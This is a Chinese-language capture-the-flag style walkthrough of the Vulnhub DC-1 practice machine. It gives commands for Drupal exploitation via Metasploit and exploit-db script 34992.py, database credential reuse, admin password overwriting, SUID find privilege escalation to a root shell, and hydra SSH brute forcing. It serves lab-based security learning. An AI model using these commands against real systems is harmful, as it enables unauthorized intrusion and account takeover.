Vulnhub靶场——DC-1
记一次Vulnhub靶场练习记录
靶机DC-1下载地址:
官方地址
https://download.vulnhub.com/dc/DC-1.zip
该靶场共有5个flag,下面我们一个一个寻找
打开靶机,使用kali进行局域网地址扫描
方法一、
arp-scan -l
方法二、
查看本机IP
ip addr
nmap -sP 192.168.101.0/24
发现目标主机后检测其开放的端口
nmap -A -p- 192.168.101.11
发现开启了80端口,在浏览器查看页面信息
使用kali的Metasploit工具检查Drupal网站存在的漏洞
使用相对较新的漏洞成功率会高一点
顺利拿到shell,查看当前目录下的文件结构
发现flag1.txt,使用cat命令进行查看
得到下一步骤的提示,去查看配置文件
查找后发现CMS的配置文件是网站根目录下的sites/default下的setting.php文件
查看文件信息
在这里发现了flag2和数据库用户名和密码的信息
尝试登陆数据库
发现有python工具
发现靶机已安装python 2.7.3,通过pty.spawn()获得交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
利用之前拿到的账号密码登陆MySQL
mysql -udbuser -pR0ck3t
成功登陆到MySQL数据库中,查看数据库名
发现users数据表,猜测存储的是用户信息
这里有两个方法获得admin权限
方法一、使用漏洞得到一个具有admin权限的新用户
查看版本信息
cat /var/www/includes/bootstrap.inc | grep VERSION
Drupal版本为7.24
查询攻击脚本信息
searchsploit drupal
可以添加的用户名为admin1,密码为admin1使用适合的攻击脚本进行攻击
python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.101.11 -u admin1 -p admin1
查询数据库信息
方法二、更改admin的密码
加密脚本位置在网站根目录下的scripts下,查询网站根目录位置
切换到网站根目录,使用加密脚本生成加密密文
./scripts/password-hash.sh
进入MySQL更改admin密码
update users set pass="$S$D1mTsTyVgtvyORw3IOMad6WA5GlcWXJXFTNIzW670qs055u0/mY9" where uid=1;
查询数据信息
更改成功
在网页进行登陆,在Content中发现flag3
Flag3关键词有perms、find、-exec、shadow
使用find查询有特殊权限suid的命令
find / -perm -4000
find / -type f -perm -u=s 2>/dev/null
发现其中有find命令,使用find命令进行提权
开始尝试
touch aaa
find ./ -name aaa -exec "whoami" \;
find ./ -name aaa -exec "/bin/sh" \;
成功提权
之前在查看网站根目录时发现有一个flag4用户,所以在home目录下应该还有一个flag4目录
进行查看
查看root目录结构
成功拿到全部flag
.
.
.
.
.
.
此系统的flag4用户可以使用hydra工具爆破密码,下载John密码包
wget clone http://www.openwall.com/john/j/john-1.8.0.tar.gz
tar -xvf john-1.8.0.tar.gz
cd john-1.8.0/src
make linux-x86-64
查看/etc/shadow信息
使用如下命令进行暴力破解
hydra -l flag4 -P john-1.8.0/run/password.lst ssh://192.168.101.11 -f -vV -o hydraflag4.ssh
得到flag4的账号密码
login: flag4 password: orange
可以使用ssh进行登陆
如果直接进行了提权操作就不需要对flag4进行暴力破解了,可以直接看到flag4信息,而且flag4用户无法查看/root目录内的文件信息,所以还是直接提权方便一点
.
本文参考文档
https://blog.csdn.net/weixin_43583637/article/details/101542749
https://blog.csdn.net/weixin_41038469/article/details/88409725
Vulnhub靶场——DC-1的更多相关文章
- Vulnhub靶场DC-1 WP
前言 之前提到过最近在做vlunhub的靶场复现工作,今天开始更新writeup吧.(对着walkthrough一顿乱抄嘻嘻嘻) 关于DC-1(官网翻译来的) 描述 DC-1是一个专门构建的易受攻击的 ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- VulnHub靶场学习_HA: ARMOUR
HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ...
- VulnHub靶场学习_HA: InfinityStones
HA-InfinityStones Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-infinity-stones,366/ 背景: 灭霸认为,如果他杀 ...
- VulnHub靶场学习_HA: Avengers Arsenal
HA: Avengers Arsenal Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-avengers-arsenal,369/ 背景: 复仇者联盟 ...
- VulnHub靶场学习_HA: Chanakya
HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...
- VulnHub靶场学习_HA: Pandavas
HA: Pandavas Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-pandavas,487/ 背景: Pandavas are the warr ...
- VulnHub靶场学习_HA: Natraj
HA: Natraj Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-natraj,489/ 背景: Nataraj is a dancing avat ...
- VulnHub靶场学习_HA: Chakravyuh
HA: Chakravyuh Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/ 背景: Close your eyes a ...
随机推荐
- 求求你,别再用wait和notify了!
Condition 是 JDK 1.5 中提供的用来替代 wait 和 notify 的线程通讯方法,那么一定会有人问:为什么不能用 wait 和 notify 了? 哥们我用的好好的.老弟别着急,听 ...
- [从源码学设计]蚂蚁金服SOFARegistry之时间轮的使用
[从源码学设计]蚂蚁金服SOFARegistry之时间轮的使用 目录 [从源码学设计]蚂蚁金服SOFARegistry之时间轮的使用 0x00 摘要 0x01 业务领域 1.1 应用场景 0x02 定 ...
- elasticsearch6.5.x-centos6
elasticsearch6.5.x-centos6 elasticsearch 和 关系型数据库中的类比 es ====== RDBMS index ----- database type ---- ...
- maven中引入jstl
<!--jsp标签--> <dependency> <groupId>taglibs</groupId> <artifactId>stand ...
- beautiful soup 遇到class标签的值中含有空格的处理
用Python写一个爬虫,用BeautifulSoup解析html.其中一个地方需要抓取下面两类标签:<dd class="ab " >blabla1</dd&g ...
- Spring MVC整合 freemarker
1.什么是Spring MVC? Spring MVC是一种基于Java的实现了Web MVC设计模式的请求驱动类型的轻量级Web框架,即使用了MVC架构模式的思想,将Web层进行职责解耦,基于请求驱 ...
- C#爬虫,让你不再觉得神秘
1.使用第三方类库 HtmlAgilityPack 官方网址:https://html-agility-pack.net/?z=codeplex. // From File 从文件获取html信息 v ...
- Django项目连接多个数据库配置
1.设置数据库连接 pip install PyMySQL 2.在项目同名目录myproject/myproject下的__init__.py添加以下代码 import pymysql pymysql ...
- C# Wpf 文件保存对话框
C# Wpf库中无文件保存对话框,需引用winform,引用winform后多处提示引用不明确,将winform引用改别名. // 引用winform,改别名 using Forms = System ...
- webform中DropdownList绑定多个字段
说明 ListItem中有Attributes属性,手动创建一个自定义属性,赋值需要绑定的字段的值. 这样的话,前台js也可以获取到,能够显示到前台html,进行控制. 代码 foreach(Data ...